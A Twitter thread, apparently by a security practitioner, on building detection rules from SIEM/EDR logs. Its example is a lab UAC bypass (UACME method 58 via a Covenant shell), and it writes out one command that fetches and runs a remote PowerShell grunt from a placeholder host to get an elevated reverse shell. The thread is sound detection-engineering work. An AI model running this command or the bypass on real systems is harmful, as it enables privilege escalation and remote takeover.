Many customers log process starts and executed programs in a SIEM, or have an EDR in use. Nevertheless, the question often arises: which product could one still buy? None at all! Best build-up detections with the existing logs. An example (🧵):
#CyberSecurity
#CyberSecurity
#UACME (github.com/hfiref0x/UACME) lists a large set of UAC bypass techniques. Here is a (recent) overview of which techniques currently work and which do not: medium.com/falconforce/fa…
@falconforceteam
@falconforceteam
The file we use to bypass UAC is "Akagi64.exe" - either compile it yourself from the UACME repository or download it (at your own risk) from a public source. Use the upload task from #Covenant to upload the binary to the target host (given ofc that we already have a shell). 
The launcher shows the URL where the PowerShell grunt can be found on the #Covenant server. We use this code to send us a new shell with a (hopefully) higher integrity back to our Covenant server.
Given that we have a shell i.e. a Grunt with normal integrity, issue the following command via the ShellCmd task:
> C:\Users\vagrant\Downloads\Akagi64.exe 58 "powershell -c iex (new-object net.webclient).downloadstring('http://<IP>/PS_Grunt.ps1')"
A few seconds later, a new Grunt with high integrity should appear. I took the screenshots a few months ago, so maybe this technique no longer works.
The UACME repository describes all UAC bypass techniques, including number 58, which we successfully used to elevate our privileges.
With a Google search for "Clipup" and "IEditionUpgradeManager", we find the publicly viewable rules from @elastic that have already mapped this UAC bypass with a rule:
We find the information from the Elastic rule in the same way in our logs after executing the UAC bypass (command line is Clipup.exe, the parent is DLLHost.exe, and the arguments is the COM interface).
Creating an alert or monitor for this sequence of commands should now be trivial.
UAC can also be switched off manually - this setting is explicitly not recommended but is encountered repeatedly in assessments. The Hunt CmdShell in @velocidex can be used to search for disabled UAC.
This example of the UAC bypass shows well how attack techniques can be tested within a lab and how to analyze the logs afterward to craft detection rules from the observed behavior.
@elastic has made several other rules public - here analysts can take a look at ready-made rules and integrate them into their environment: elastic.co/guide/en/secur…
• • •
Missing some Tweet in this thread? You can try to
force a refresh
